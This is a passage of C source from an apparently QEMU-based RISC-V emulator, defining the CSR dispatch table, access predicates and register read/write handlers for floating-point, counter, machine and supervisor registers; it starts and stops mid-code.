target_ulong val); static int pmp(CPURISCVState *env, int csrno); #if defined(TARGET_RISCV32) static int read_instreth(CPURISCVState *env, int csrno, target_ulong *val); static int read_timeh(CPURISCVState *env, int csrno, target_ulong *val); static int read_mstatush(CPURISCVState *env, int csrno, target_ulong *val); static int write_mstatush(CPURISCVState *env, int csrno, target_ulong val); static int read_htimedeltah(CPURISCVState *env, int csrno, target_ulong *val); static int write_htimedeltah(CPURISCVState *env, int csrno, target_ulong val); #endif /* CSR function table constants */ enum { CSR_TABLE_SIZE = 0x1000 }; /* Control and Status Register function table */ static riscv_csr_operations csr_ops[CSR_TABLE_SIZE] = { /* User Floating-Point CSRs */ [CSR_FFLAGS] = { fs, read_fflags, write_fflags }, [CSR_FRM] = { fs, read_frm, write_frm }, [CSR_FCSR] = { fs, read_fcsr, write_fcsr }, /* User Timers and Counters */ [CSR_CYCLE] = { ctr, read_instret }, [CSR_INSTRET] = { ctr, read_instret }, #if defined(TARGET_RISCV32) [CSR_CYCLEH] = { ctr, read_instreth }, [CSR_INSTRETH] = { ctr, read_instreth }, #endif /* In privileged mode, the monitor will have to emulate TIME CSRs only if * rdtime callback is not provided by machine/platform emulation */ [CSR_TIME] = { ctr, read_time }, #if defined(TARGET_RISCV32) [CSR_TIMEH] = { ctr, read_timeh }, #endif /* Machine Timers and Counters */ [CSR_MCYCLE] = { any, read_instret }, [CSR_MINSTRET] = { any, read_instret }, #if defined(TARGET_RISCV32) [CSR_MCYCLEH] = { any, read_instreth }, [CSR_MINSTRETH] = { any, read_instreth }, #endif /* Machine Information Registers */ [CSR_MVENDORID] = { any, read_zero }, [CSR_MARCHID] = { any, read_zero }, [CSR_MIMPID] = { any, read_zero }, [CSR_MHARTID] = { any, read_mhartid }, /* Machine Trap Setup */ [CSR_MSTATUS] = { any, read_mstatus, write_mstatus }, [CSR_MISA] = { any, read_misa, write_misa }, [CSR_MIDELEG] = { any, read_mideleg, write_mideleg }, [CSR_MEDELEG] = { any, read_medeleg, write_medeleg }, [CSR_MIE] = { any, read_mie, write_mie }, [CSR_MTVEC] = { any, read_mtvec, write_mtvec 
}, [CSR_MCOUNTEREN] = { any, read_mcounteren, write_mcounteren }, #if defined(TARGET_RISCV32) [CSR_MSTATUSH] = { any, read_mstatush, write_mstatush }, #endif /* Legacy Counter Setup (priv v1.9.1) */ [CSR_MUCOUNTEREN] = { any, read_mucounteren, write_mucounteren }, [CSR_MSCOUNTEREN] = { any, read_mscounteren, write_mscounteren }, /* Machine Trap Handling */ [CSR_MSCRATCH] = { any, read_mscratch, write_mscratch }, [CSR_MEPC] = { any, read_mepc, write_mepc }, [CSR_MCAUSE] = { any, read_mcause, write_mcause }, [CSR_MBADADDR] = { any, read_mbadaddr, write_mbadaddr }, [CSR_MIP] = { any, NULL, NULL, rmw_mip }, /* Supervisor Trap Setup */ [CSR_SSTATUS] = { smode, read_sstatus, write_sstatus }, [CSR_SIE] = { smode, read_sie, write_sie }, [CSR_STVEC] = { smode, read_stvec, write_stvec }, [CSR_SCOUNTEREN] = { smode, read_scounteren, write_scounteren }, /* Supervisor Trap Handling */ [CSR_SSCRATCH] = { smode, read_sscratch, write_sscratch }, [CSR_SEPC] = { smode, read_sepc, write_sepc }, [CSR_SCAUSE] = { smode, read_scause, write_scause }, [CSR_SBADADDR] = { smode, read_sbadaddr, write_sbadaddr }, [CSR_SIP] = { smode, NULL, NULL, rmw_sip }, /* Supervisor Protection and Translation */ [CSR_SATP] = { smode, read_satp, write_satp }, [CSR_HSTATUS] = { hmode, read_hstatus, write_hstatus }, [CSR_HEDELEG] = { hmode, read_hedeleg, write_hedeleg }, [CSR_HIDELEG] = { hmode, read_hideleg, write_hideleg }, [CSR_HIP] = { hmode, NULL, NULL, rmw_hip }, [CSR_HIE] = { hmode, read_hie, write_hie }, [CSR_HCOUNTEREN] = { hmode, read_hcounteren, write_hcounteren }, [CSR_HTVAL] = { hmode, read_htval, write_htval }, [CSR_HTINST] = { hmode, read_htinst, write_htinst }, [CSR_HGATP] = { hmode, read_hgatp, write_hgatp }, [CSR_HTIMEDELTA] = { hmode, read_htimedelta, write_htimedelta }, #if defined(TARGET_RISCV32) [CSR_HTIMEDELTAH] = { hmode, read_htimedeltah, write_htimedeltah}, #endif [CSR_VSSTATUS] = { hmode, read_vsstatus, write_vsstatus }, [CSR_VSIP] = { hmode, NULL, NULL, rmw_vsip }, [CSR_VSIE] = { hmode, read_vsie, write_vsie }, [CSR_VSTVEC] = { hmode, read_vstvec, write_vstvec }, [CSR_VSSCRATCH] = { hmode, read_vsscratch, write_vsscratch }, [CSR_VSEPC] = { hmode, read_vsepc, write_vsepc }, [CSR_VSCAUSE] = { hmode, read_vscause, write_vscause }, [CSR_VSTVAL] = { hmode, read_vstval, write_vstval }, [CSR_VSATP] = { hmode, read_vsatp, write_vsatp }, [CSR_MTVAL2] = { hmode, read_mtval2, write_mtval2 }, [CSR_MTINST] = { hmode, read_mtinst, write_mtinst }, /* Physical Memory Protection */ [CSR_PMPCFG0] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPCFG1] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPCFG2] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPCFG3] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPADDR0] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR1] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR2] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR3] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR4] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR5] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR6] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR7] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR8] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR9] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR10] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR11] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR12] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR13] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR14] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR15] = { 
pmp, read_pmpaddr, write_pmpaddr }, /* Performance Counters */ [CSR_HPMCOUNTER3] = { ctr, read_zero }, [CSR_HPMCOUNTER4] = { ctr, read_zero }, [CSR_HPMCOUNTER5] = { ctr, read_zero }, [CSR_HPMCOUNTER6] = { ctr, read_zero }, [CSR_HPMCOUNTER7] = { ctr, read_zero }, [CSR_HPMCOUNTER8] = { ctr, read_zero }, [CSR_HPMCOUNTER9] = { ctr, read_zero }, [CSR_HPMCOUNTER10] = { ctr, read_zero }, [CSR_HPMCOUNTER11] = { ctr, read_zero }, [CSR_HPMCOUNTER12] = { ctr, read_zero }, [CSR_HPMCOUNTER13] = { ctr, read_zero }, [CSR_HPMCOUNTER14] = { ctr, read_zero }, [CSR_HPMCOUNTER15] = { ctr, read_zero }, [CSR_HPMCOUNTER16] = { ctr, read_zero }, [CSR_HPMCOUNTER17] = { ctr, read_zero }, [CSR_HPMCOUNTER18] = { ctr, read_zero }, [CSR_HPMCOUNTER19] = { ctr, read_zero }, [CSR_HPMCOUNTER20] = { ctr, read_zero }, [CSR_HPMCOUNTER21] = { ctr, read_zero }, [CSR_HPMCOUNTER22] = { ctr, read_zero }, [CSR_HPMCOUNTER23] = { ctr, read_zero }, [CSR_HPMCOUNTER24] = { ctr, read_zero }, [CSR_HPMCOUNTER25] = { ctr, read_zero }, [CSR_HPMCOUNTER26] = { ctr, read_zero }, [CSR_HPMCOUNTER27] = { ctr, read_zero }, [CSR_HPMCOUNTER28] = { ctr, read_zero }, [CSR_HPMCOUNTER29] = { ctr, read_zero }, [CSR_HPMCOUNTER30] = { ctr, read_zero }, [CSR_HPMCOUNTER31] = { ctr, read_zero }, [CSR_MHPMCOUNTER3] = { any, read_zero }, [CSR_MHPMCOUNTER4] = { any, read_zero }, [CSR_MHPMCOUNTER5] = { any, read_zero }, [CSR_MHPMCOUNTER6] = { any, read_zero }, [CSR_MHPMCOUNTER7] = { any, read_zero }, [CSR_MHPMCOUNTER8] = { any, read_zero }, [CSR_MHPMCOUNTER9] = { any, read_zero }, [CSR_MHPMCOUNTER10] = { any, read_zero }, [CSR_MHPMCOUNTER11] = { any, read_zero }, [CSR_MHPMCOUNTER12] = { any, read_zero }, [CSR_MHPMCOUNTER13] = { any, read_zero }, [CSR_MHPMCOUNTER14] = { any, read_zero }, [CSR_MHPMCOUNTER15] = { any, read_zero }, [CSR_MHPMCOUNTER16] = { any, read_zero }, [CSR_MHPMCOUNTER17] = { any, read_zero }, [CSR_MHPMCOUNTER18] = { any, read_zero }, [CSR_MHPMCOUNTER19] = { any, read_zero }, [CSR_MHPMCOUNTER20] = { any, read_zero }, [CSR_MHPMCOUNTER21] = { any, read_zero }, [CSR_MHPMCOUNTER22] = { any, read_zero }, [CSR_MHPMCOUNTER23] = { any, read_zero }, [CSR_MHPMCOUNTER24] = { any, read_zero }, [CSR_MHPMCOUNTER25] = { any, read_zero }, [CSR_MHPMCOUNTER26] = { any, read_zero }, [CSR_MHPMCOUNTER27] = { any, read_zero }, [CSR_MHPMCOUNTER28] = { any, read_zero }, [CSR_MHPMCOUNTER29] = { any, read_zero }, [CSR_MHPMCOUNTER30] = { any, read_zero }, [CSR_MHPMCOUNTER31] = { any, read_zero }, [CSR_MHPMEVENT3] = { any, read_zero }, [CSR_MHPMEVENT4] = { any, read_zero }, [CSR_MHPMEVENT5] = { any, read_zero }, [CSR_MHPMEVENT6] = { any, read_zero }, [CSR_MHPMEVENT7] = { any, read_zero }, [CSR_MHPMEVENT8] = { any, read_zero }, [CSR_MHPMEVENT9] = { any, read_zero }, [CSR_MHPMEVENT10] = { any, read_zero }, [CSR_MHPMEVENT11] = { any, read_zero }, [CSR_MHPMEVENT12] = { any, read_zero }, [CSR_MHPMEVENT13] = { any, read_zero }, [CSR_MHPMEVENT14] = { any, read_zero }, [CSR_MHPMEVENT15] = { any, read_zero }, [CSR_MHPMEVENT16] = { any, read_zero }, [CSR_MHPMEVENT17] = { any, read_zero }, [CSR_MHPMEVENT18] = { any, read_zero }, [CSR_MHPMEVENT19] = { any, read_zero }, [CSR_MHPMEVENT20] = { any, read_zero }, [CSR_MHPMEVENT21] = { any, read_zero }, [CSR_MHPMEVENT22] = { any, read_zero }, [CSR_MHPMEVENT23] = { any, read_zero }, [CSR_MHPMEVENT24] = { any, read_zero }, [CSR_MHPMEVENT25] = { any, read_zero }, [CSR_MHPMEVENT26] = { any, read_zero }, [CSR_MHPMEVENT27] = { any, read_zero }, [CSR_MHPMEVENT28] = { any, read_zero }, [CSR_MHPMEVENT29] = { any, read_zero }, [CSR_MHPMEVENT30] = { 
any, read_zero },
    [CSR_MHPMEVENT31] = { any, read_zero },

#if defined(TARGET_RISCV32)
    [CSR_HPMCOUNTER3H] = { ctr, read_zero },
    [CSR_HPMCOUNTER4H] = { ctr, read_zero },
    [CSR_HPMCOUNTER5H] = { ctr, read_zero },
    [CSR_HPMCOUNTER6H] = { ctr, read_zero },
    [CSR_HPMCOUNTER7H] = { ctr, read_zero },
    [CSR_HPMCOUNTER8H] = { ctr, read_zero },
    [CSR_HPMCOUNTER9H] = { ctr, read_zero },
    [CSR_HPMCOUNTER10H] = { ctr, read_zero },
    [CSR_HPMCOUNTER11H] = { ctr, read_zero },
    [CSR_HPMCOUNTER12H] = { ctr, read_zero },
    [CSR_HPMCOUNTER13H] = { ctr, read_zero },
    [CSR_HPMCOUNTER14H] = { ctr, read_zero },
    [CSR_HPMCOUNTER15H] = { ctr, read_zero },
    [CSR_HPMCOUNTER16H] = { ctr, read_zero },
    [CSR_HPMCOUNTER17H] = { ctr, read_zero },
    [CSR_HPMCOUNTER18H] = { ctr, read_zero },
    [CSR_HPMCOUNTER19H] = { ctr, read_zero },
    [CSR_HPMCOUNTER20H] = { ctr, read_zero },
    [CSR_HPMCOUNTER21H] = { ctr, read_zero },
    [CSR_HPMCOUNTER22H] = { ctr, read_zero },
    [CSR_HPMCOUNTER23H] = { ctr, read_zero },
    [CSR_HPMCOUNTER24H] = { ctr, read_zero },
    [CSR_HPMCOUNTER25H] = { ctr, read_zero },
    [CSR_HPMCOUNTER26H] = { ctr, read_zero },
    [CSR_HPMCOUNTER27H] = { ctr, read_zero },
    [CSR_HPMCOUNTER28H] = { ctr, read_zero },
    [CSR_HPMCOUNTER29H] = { ctr, read_zero },
    [CSR_HPMCOUNTER30H] = { ctr, read_zero },
    [CSR_HPMCOUNTER31H] = { ctr, read_zero },

    [CSR_MHPMCOUNTER3H] = { any, read_zero },
    [CSR_MHPMCOUNTER4H] = { any, read_zero },
    [CSR_MHPMCOUNTER5H] = { any, read_zero },
    [CSR_MHPMCOUNTER6H] = { any, read_zero },
    [CSR_MHPMCOUNTER7H] = { any, read_zero },
    [CSR_MHPMCOUNTER8H] = { any, read_zero },
    [CSR_MHPMCOUNTER9H] = { any, read_zero },
    [CSR_MHPMCOUNTER10H] = { any, read_zero },
    [CSR_MHPMCOUNTER11H] = { any, read_zero },
    [CSR_MHPMCOUNTER12H] = { any, read_zero },
    [CSR_MHPMCOUNTER13H] = { any, read_zero },
    [CSR_MHPMCOUNTER14H] = { any, read_zero },
    [CSR_MHPMCOUNTER15H] = { any, read_zero },
    [CSR_MHPMCOUNTER16H] = { any, read_zero },
    [CSR_MHPMCOUNTER17H] = { any, read_zero },
    [CSR_MHPMCOUNTER18H] = { any, read_zero },
    [CSR_MHPMCOUNTER19H] = { any, read_zero },
    [CSR_MHPMCOUNTER20H] = { any, read_zero },
    [CSR_MHPMCOUNTER21H] = { any, read_zero },
    [CSR_MHPMCOUNTER22H] = { any, read_zero },
    [CSR_MHPMCOUNTER23H] = { any, read_zero },
    [CSR_MHPMCOUNTER24H] = { any, read_zero },
    [CSR_MHPMCOUNTER25H] = { any, read_zero },
    [CSR_MHPMCOUNTER26H] = { any, read_zero },
    [CSR_MHPMCOUNTER27H] = { any, read_zero },
    [CSR_MHPMCOUNTER28H] = { any, read_zero },
    [CSR_MHPMCOUNTER29H] = { any, read_zero },
    [CSR_MHPMCOUNTER30H] = { any, read_zero },
    [CSR_MHPMCOUNTER31H] = { any, read_zero },
#endif
};

/* CSR function table public API */
void riscv_get_csr_ops(int csrno, riscv_csr_operations *ops)
{
    *ops = csr_ops[csrno & (CSR_TABLE_SIZE - 1)];
}

void riscv_set_csr_ops(int csrno, riscv_csr_operations *ops)
{
    csr_ops[csrno & (CSR_TABLE_SIZE - 1)] = *ops;
}

/* Predicates */
static int fs(CPURISCVState *env, int csrno)
{
    if (!env->debugger && !riscv_cpu_fp_enabled(env)) {
        return -1;
    }
    return 0;
}

static int ctr(CPURISCVState *env, int csrno)
{
    CPUState *cs = env_cpu(env);
    RISCVCPU *cpu = RISCV_CPU(cs);
    uint32_t ctr_en = ~0u;

    if (!cpu->cfg.ext_counters) {
        /* The Counters extension is not enabled */
        return -1;
    }

    /*
     * The counters are always enabled at run time on newer priv specs, as the
     * CSR has changed from controlling that the counters can be read to
     * controlling that the counters increment.
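     * (Note: this is why the check directly below returns 0 for priv
     * versions newer than 1.09.1; the mcounteren/scounteren bit test
     * further down applies only to the older spec. For example, CSR_CYCLE
     * is 0xC00, so (csrno & 31) == 0 selects the CY bit of the enable
     * mask.)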
*/ if (env->priv_ver > PRIV_VERSION_1_09_1) { return 0; } if (env->priv < PRV_M) { ctr_en &= env->mcounteren; } if (env->priv < PRV_S) { ctr_en &= env->scounteren; } if (!(ctr_en & (1u << (csrno & 31)))) { return -1; } return 0; } static int any(CPURISCVState *env, int csrno) { return 0; } static int smode(CPURISCVState *env, int csrno) { return -!riscv_has_ext(env, RVS); } static int hmode(CPURISCVState *env, int csrno) { if (riscv_has_ext(env, RVS) && riscv_has_ext(env, RVH)) { /* Hypervisor extension is supported */ if ((env->priv == PRV_S && !riscv_cpu_virt_enabled(env)) || env->priv == PRV_M) { return 0; } } return -1; } static int pmp(CPURISCVState *env, int csrno) { return -!riscv_feature(env, RISCV_FEATURE_PMP); } /* User Floating-Point CSRs */ static int read_fflags(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } *val = riscv_cpu_get_fflags(env); return 0; } static int write_fflags(CPURISCVState *env, int csrno, target_ulong val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } env->mstatus |= MSTATUS_FS; riscv_cpu_set_fflags(env, val & (FSR_AEXC >> FSR_AEXC_SHIFT)); return 0; } static int read_frm(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } *val = env->frm; return 0; } static int write_frm(CPURISCVState *env, int csrno, target_ulong val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } env->mstatus |= MSTATUS_FS; env->frm = val & (FSR_RD >> FSR_RD_SHIFT); return 0; } static int read_fcsr(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } *val = (riscv_cpu_get_fflags(env) << FSR_AEXC_SHIFT) | (env->frm << FSR_RD_SHIFT); return 0; } static int write_fcsr(CPURISCVState *env, int csrno, target_ulong val) { if (!env->debugger && !riscv_cpu_fp_enabled(env)) { return -1; } env->mstatus |= MSTATUS_FS; env->frm = (val & FSR_RD) >> FSR_RD_SHIFT; riscv_cpu_set_fflags(env, (val & FSR_AEXC) >> FSR_AEXC_SHIFT); return 0; } /* User Timers and Counters */ static int read_instret(CPURISCVState *env, int csrno, target_ulong *val) { *val = cpu_get_host_ticks(); return 0; } #if defined(TARGET_RISCV32) static int read_instreth(CPURISCVState *env, int csrno, target_ulong *val) { *val = cpu_get_host_ticks() >> 32; return 0; } #endif /* TARGET_RISCV32 */ static int read_time(CPURISCVState *env, int csrno, target_ulong *val) { uint64_t delta = riscv_cpu_virt_enabled(env) ? env->htimedelta : 0; if (!env->rdtime_fn) { return -1; } *val = env->rdtime_fn() + delta; return 0; } #if defined(TARGET_RISCV32) static int read_timeh(CPURISCVState *env, int csrno, target_ulong *val) { uint64_t delta = riscv_cpu_virt_enabled(env) ? 
env->htimedelta : 0; if (!env->rdtime_fn) { return -1; } *val = (env->rdtime_fn() + delta) >> 32; return 0; } #endif /* Machine constants */ #define M_MODE_INTERRUPTS (MIP_MSIP | MIP_MTIP | MIP_MEIP) #define S_MODE_INTERRUPTS (MIP_SSIP | MIP_STIP | MIP_SEIP) #define VS_MODE_INTERRUPTS (MIP_VSSIP | MIP_VSTIP | MIP_VSEIP) static const target_ulong delegable_ints = S_MODE_INTERRUPTS | VS_MODE_INTERRUPTS; static const target_ulong all_ints = M_MODE_INTERRUPTS | S_MODE_INTERRUPTS | VS_MODE_INTERRUPTS; static const target_ulong delegable_excps = (1ULL << (RISCV_EXCP_INST_ADDR_MIS)) | (1ULL << (RISCV_EXCP_INST_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_ILLEGAL_INST)) | (1ULL << (RISCV_EXCP_BREAKPOINT)) | (1ULL << (RISCV_EXCP_LOAD_ADDR_MIS)) | (1ULL << (RISCV_EXCP_LOAD_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_STORE_AMO_ADDR_MIS)) | (1ULL << (RISCV_EXCP_STORE_AMO_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_U_ECALL)) | (1ULL << (RISCV_EXCP_S_ECALL)) | (1ULL << (RISCV_EXCP_VS_ECALL)) | (1ULL << (RISCV_EXCP_M_ECALL)) | (1ULL << (RISCV_EXCP_INST_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_LOAD_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_STORE_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_INST_GUEST_PAGE_FAULT)) | (1ULL << (RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT)) | (1ULL << (RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT)); static const target_ulong sstatus_v1_9_mask = SSTATUS_SIE | SSTATUS_SPIE | SSTATUS_UIE | SSTATUS_UPIE | SSTATUS_SPP | SSTATUS_FS | SSTATUS_XS | SSTATUS_SUM | SSTATUS_SD; static const target_ulong sstatus_v1_10_mask = SSTATUS_SIE | SSTATUS_SPIE | SSTATUS_UIE | SSTATUS_UPIE | SSTATUS_SPP | SSTATUS_FS | SSTATUS_XS | SSTATUS_SUM | SSTATUS_MXR | SSTATUS_SD; static const target_ulong sip_writable_mask = SIP_SSIP | MIP_USIP | MIP_UEIP; static const target_ulong hip_writable_mask = MIP_VSSIP | MIP_VSTIP | MIP_VSEIP; static const target_ulong vsip_writable_mask = MIP_VSSIP; #if defined(TARGET_RISCV32) static const char valid_vm_1_09[16] = { [VM_1_09_MBARE] = 1, [VM_1_09_SV32] = 1, }; static const char valid_vm_1_10[16] = { [VM_1_10_MBARE] = 1, [VM_1_10_SV32] = 1 }; #elif defined(TARGET_RISCV64) static const char valid_vm_1_09[16] = { [VM_1_09_MBARE] = 1, [VM_1_09_SV39] = 1, [VM_1_09_SV48] = 1, }; static const char valid_vm_1_10[16] = { [VM_1_10_MBARE] = 1, [VM_1_10_SV39] = 1, [VM_1_10_SV48] = 1, [VM_1_10_SV57] = 1 }; #endif /* Machine Information Registers */ static int read_zero(CPURISCVState *env, int csrno, target_ulong *val) { return *val = 0; } static int read_mhartid(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mhartid; return 0; } /* Machine Trap Setup */ static int read_mstatus(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mstatus; return 0; } static int validate_vm(CPURISCVState *env, target_ulong vm) { return (env->priv_ver >= PRIV_VERSION_1_10_0) ? valid_vm_1_10[vm & 0xf] : valid_vm_1_09[vm & 0xf]; } static int write_mstatus(CPURISCVState *env, int csrno, target_ulong val) { target_ulong mstatus = env->mstatus; target_ulong mask = 0; int dirty; /* flush tlb on mstatus fields that affect VM */ if (env->priv_ver <= PRIV_VERSION_1_09_1) { if ((val ^ mstatus) & (MSTATUS_MXR | MSTATUS_MPP | MSTATUS_MPRV | MSTATUS_SUM | MSTATUS_VM)) { tlb_flush(env_cpu(env)); } mask = MSTATUS_SIE | MSTATUS_SPIE | MSTATUS_MIE | MSTATUS_MPIE | MSTATUS_SPP | MSTATUS_FS | MSTATUS_MPRV | MSTATUS_SUM | MSTATUS_MPP | MSTATUS_MXR | (validate_vm(env, get_field(val, MSTATUS_VM)) ? 
MSTATUS_VM : 0); } if (env->priv_ver >= PRIV_VERSION_1_10_0) { if ((val ^ mstatus) & (MSTATUS_MXR | MSTATUS_MPP | MSTATUS_MPV | MSTATUS_MPRV | MSTATUS_SUM)) { tlb_flush(env_cpu(env)); } mask = MSTATUS_SIE | MSTATUS_SPIE | MSTATUS_MIE | MSTATUS_MPIE | MSTATUS_SPP | MSTATUS_FS | MSTATUS_MPRV | MSTATUS_SUM | MSTATUS_MPP | MSTATUS_MXR | MSTATUS_TVM | MSTATUS_TSR | MSTATUS_TW; #if defined(TARGET_RISCV64) /* * RV32: MPV and MTL are not in mstatus. The current plan is to * add them to mstatush. For now, we just don't support it. */ mask |= MSTATUS_MTL | MSTATUS_MPV; #endif } mstatus = (mstatus & ~mask) | (val & mask); dirty = ((mstatus & MSTATUS_FS) == MSTATUS_FS) | ((mstatus & MSTATUS_XS) == MSTATUS_XS); mstatus = set_field(mstatus, MSTATUS_SD, dirty); env->mstatus = mstatus; return 0; } #ifdef TARGET_RISCV32 static int read_mstatush(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mstatush; return 0; } static int write_mstatush(CPURISCVState *env, int csrno, target_ulong val) { if ((val ^ env->mstatush) & (MSTATUS_MPV)) { tlb_flush(env_cpu(env)); } val &= MSTATUS_MPV | MSTATUS_MTL; env->mstatush = val; return 0; } #endif static int read_misa(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->misa; return 0; } static int write_misa(CPURISCVState *env, int csrno, target_ulong val) { if (!riscv_feature(env, RISCV_FEATURE_MISA)) { /* drop write to misa */ return 0; } /* 'I' or 'E' must be present */ if (!(val & (RVI | RVE))) { /* It is not, drop write to misa */ return 0; } /* 'E' excludes all other extensions */ if (val & RVE) { /* when we support 'E' we can do "val = RVE;" however * for now we just drop writes if 'E' is present. */ return 0; } /* Mask extensions that are not supported by this hart */ val &= env->misa_mask; /* Mask extensions that are not supported by QEMU */ val &= (RVI | RVE | RVM | RVA | RVF | RVD | RVC | RVS | RVU); /* 'D' depends on 'F', so clear 'D' if 'F' is not present */ if ((val & RVD) && !(val & RVF)) { val &= ~RVD; } /* Suppress 'C' if next instruction is not aligned * TODO: this should check next_pc */ if ((val & RVC) && (GETPC() & ~3) != 0) { val &= ~RVC; } /* misa.MXL writes are not supported by QEMU */ val = (env->misa & MISA_MXL) | (val & ~MISA_MXL); /* flush translation cache */ if (val != env->misa) { tb_flush(env_cpu(env)); } env->misa = val; return 0; } static int read_medeleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->medeleg; return 0; } static int write_medeleg(CPURISCVState *env, int csrno, target_ulong val) { env->medeleg = (env->medeleg & ~delegable_excps) | (val & delegable_excps); return 0; } static int read_mideleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mideleg; return 0; } static int write_mideleg(CPURISCVState *env, int csrno, target_ulong val) { env->mideleg = (env->mideleg & ~delegable_ints) | (val & delegable_ints); if (riscv_has_ext(env, RVH)) { env->mideleg |= VS_MODE_INTERRUPTS; } return 0; } static int read_mie(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mie; return 0; } static int write_mie(CPURISCVState *env, int csrno, target_ulong val) { env->mie = (env->mie & ~all_ints) | (val & all_ints); return 0; } static int read_mtvec(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mtvec; return 0; } static int write_mtvec(CPURISCVState *env, int csrno, target_ulong val) { /* bits [1:0] encode mode; 0 = direct, 1 = vectored, 2 >= reserved */ if ((val & 3) < 2) { env->mtvec = val; } else { qemu_log_mask(LOG_UNIMP, "CSR_MTVEC: reserved mode 
not supported\n"); } return 0; } static int read_mcounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } *val = env->mcounteren; return 0; } static int write_mcounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } env->mcounteren = val; return 0; } /* This register is replaced with CSR_MCOUNTINHIBIT in 1.11.0 */ static int read_mscounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver > PRIV_VERSION_1_09_1 && env->priv_ver < PRIV_VERSION_1_11_0) { return -1; } *val = env->mcounteren; return 0; } /* This register is replaced with CSR_MCOUNTINHIBIT in 1.11.0 */ static int write_mscounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver > PRIV_VERSION_1_09_1 && env->priv_ver < PRIV_VERSION_1_11_0) { return -1; } env->mcounteren = val; return 0; } static int read_mucounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver > PRIV_VERSION_1_09_1) { return -1; } *val = env->scounteren; return 0; } static int write_mucounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver > PRIV_VERSION_1_09_1) { return -1; } env->scounteren = val; return 0; } /* Machine Trap Handling */ static int read_mscratch(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mscratch; return 0; } static int write_mscratch(CPURISCVState *env, int csrno, target_ulong val) { env->mscratch = val; return 0; } static int read_mepc(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mepc; return 0; } static int write_mepc(CPURISCVState *env, int csrno, target_ulong val) { env->mepc = val; return 0; } static int read_mcause(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mcause; return 0; } static int write_mcause(CPURISCVState *env, int csrno, target_ulong val) { env->mcause = val; return 0; } static int read_mbadaddr(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mbadaddr; return 0; } static int write_mbadaddr(CPURISCVState *env, int csrno, target_ulong val) { env->mbadaddr = val; return 0; } static int rmw_mip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { RISCVCPU *cpu = env_archcpu(env); /* Allow software control of delegable interrupts not claimed by hardware */ target_ulong mask = write_mask & delegable_ints & ~env->miclaim; uint32_t old_mip; if (mask) { old_mip = riscv_cpu_update_mip(cpu, mask, (new_value & mask)); } else { old_mip = env->mip; } if (ret_value) { *ret_value = old_mip; } return 0; } /* Supervisor Trap Setup */ static int read_sstatus(CPURISCVState *env, int csrno, target_ulong *val) { target_ulong mask = ((env->priv_ver >= PRIV_VERSION_1_10_0) ? sstatus_v1_10_mask : sstatus_v1_9_mask); *val = env->mstatus & mask; return 0; } static int write_sstatus(CPURISCVState *env, int csrno, target_ulong val) { target_ulong mask = ((env->priv_ver >= PRIV_VERSION_1_10_0) ? 
